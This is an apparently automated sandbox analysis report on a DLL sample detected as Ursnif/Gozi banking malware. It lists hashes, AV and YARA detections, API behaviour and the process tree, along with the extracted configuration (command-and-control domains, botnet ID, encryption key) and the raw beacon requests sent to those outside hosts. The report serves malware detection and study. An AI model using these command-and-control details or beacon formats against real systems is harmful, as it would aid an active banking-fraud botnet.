Windows Analysis Report 3b17.dll

Overview

General Information

Sample Name: 3b17.dll
Analysis ID: 444315
MD5: 3b17fcc55cee8cbe4cd1b443f358c36d
SHA1: 45d1e652f282a94b37ac32afb62ff563afb2fb39
SHA256: 9ae13bdb906bf774982242a378a20fb25da3e29dd7b5e1acd2531562319edba6
Tags: dllgozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000003.00000003.286056842.0000000000800000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for submitted file
Source: 3b17.dll Metadefender: Detection: 22% Perma Link
Source: 3b17.dll ReversingLabs: Detection: 55%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_00E839C5

Compliance:

barindex
Uses 32bit PE files
Source: 3b17.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: 3b17.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49721 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49721 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49723 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49728 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49734 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49736 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49736 -> 165.232.183.49:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
Source: global traffic HTTP traffic detected: GET /TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6b9FMvL_2FIqp4S/ewVNte36FW/XPExsAA8VeJEhvgVb/KCeGwDykzB_2/FfJMiTYYFkB/UqSvKjZpB_2FYe/tRxQkg5XCh4uQfiEclNaO/UTPObDJYz_2FyBjB/v_2F2pSU4VWX5Hz/N9QtHdwYZ4WUrzEx5D/Q3nFD_2F2/8Ujs0VBDGr49KJ6AsZSH/EgfscPlAK393eCGdmmF/FMztWz0QhrOgK4MYRsuNHe/_2BkNcUEELtfv/x0cjHdMa17k7/_2FjZKD HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_2FuI_2FqZ2s_2FiaO0J_/2FTRLU31mRGflU2b/ZIJ0FncJBL1ujMu/UAyv0uh4NdsHQb_2Fp/7IlErLThx/qx9lbHRBIr_2BN2fcH7p/3MZS8xBk2HV8HO_2FwY/sjaecD1Ad9d4_2Bhfj7Udw/txqy4ndWQ8c2I/i_2FDCoi/J8FwQUA7HNUWWZ74vTmq4PN/8fRY05oVkC/eLBfQLcjbzJ0zm8P9/lrnxZ8213Jiq/fQMuhQcrOSv/_2FzhSntnuW3P7/C3J8_2BPrwDMXrvKewIwt/CP9ILXpGj47Z_2/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s96BBj_2BW0E7I/inPV3RC1ndWtP3TCiXWoq/7JGd2eicozVaSDqP/TIPKarKtLPkYLRx/VCo8CEXU6VSxFW20ap/EmssX5YuH/_2FmT3PaMcthev94lCLF/bWDeiN4zbJE6pfv8oTi/Qb34wmcConjidXNcLSenBo/rqyTVIe8oNi_2/FtqR6e_2/BJ_2F_2Ff8F8rmDwirrIz3L/Nk4szxk3_2/FsoXecNAHbdXzRM5b/qnqXpzn3ytbn/lcXf0S9I54h/nPX849yJE9mtRH/Mg8GQncb8LaArkE96Imgo/T60bsdjLtZH_2FnO/zpiezRZpQAYC8v0/MRTN6xcxZf9LqzW6jmrO/pZ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Jul 2021 14:53:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC
Source: ~DFF4A7B0CDF51E1130.TMP.24.dr, {2403265A-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6
Source: rundll32.exe, 00000003.00000002.471774654.000000000087B000.00000004.00000020.sdmp, {24032658-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr, ~DFDEC152A471305B20.TMP.24.dr String found in binary or memory: http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/B

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_00E839C5

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E191B9C GetProcAddress,NtCreateSection,memset, 0_2_6E191B9C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E191EC7 NtMapViewOfSection, 0_2_6E191EC7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E192485 NtQueryVirtualMemory, 0_2_6E192485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E82D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_00E82D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E88005 NtQueryVirtualMemory, 3_2_00E88005
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E192264 0_2_6E192264
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1EB617 0_2_6E1EB617
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F862F 0_2_6E1F862F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1ED6B0 0_2_6E1ED6B0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1E1727 0_2_6E1E1727
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1EDC20 0_2_6E1EDC20
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E208CB7 0_2_6E208CB7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F0534 0_2_6E1F0534
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F8AA2 0_2_6E1F8AA2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2162C0 0_2_6E2162C0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1EAB67 0_2_6E1EAB67
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E208B97 0_2_6E208B97
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1EE050 0_2_6E1EE050
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F8861 0_2_6E1F8861
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F917A 0_2_6E1F917A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E82206 3_2_00E82206
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E87DE0 3_2_00E87DE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E83109 3_2_00E83109
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1EB617 3_2_6E1EB617
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F862F 3_2_6E1F862F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F9653 3_2_6E1F9653
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1ED6B0 3_2_6E1ED6B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F8F15 3_2_6E1F8F15
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1E1727 3_2_6E1E1727
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1EDC20 3_2_6E1EDC20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E208CB7 3_2_6E208CB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F8CD4 3_2_6E1F8CD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F0534 3_2_6E1F0534
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F8AA2 3_2_6E1F8AA2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E2162C0 3_2_6E2162C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1EAB67 3_2_6E1EAB67
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E208B97 3_2_6E208B97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F93EE 3_2_6E1F93EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1EE050 3_2_6E1EE050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F8861 3_2_6E1F8861
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F917A 3_2_6E1F917A
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6E1DE9F0 appears 35 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E1DE9F0 appears 37 times
Uses 32bit PE files
Source: 3b17.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal80.troj.winDLL@18/8@6/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E8513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_00E8513E
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF411F8F60C26A5FE3.TMP Jump to behavior
Source: 3b17.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing
Source: 3b17.dll Metadefender: Detection: 22%
Source: 3b17.dll ReversingLabs: Detection: 55%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3b17.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2 Jump to behavior
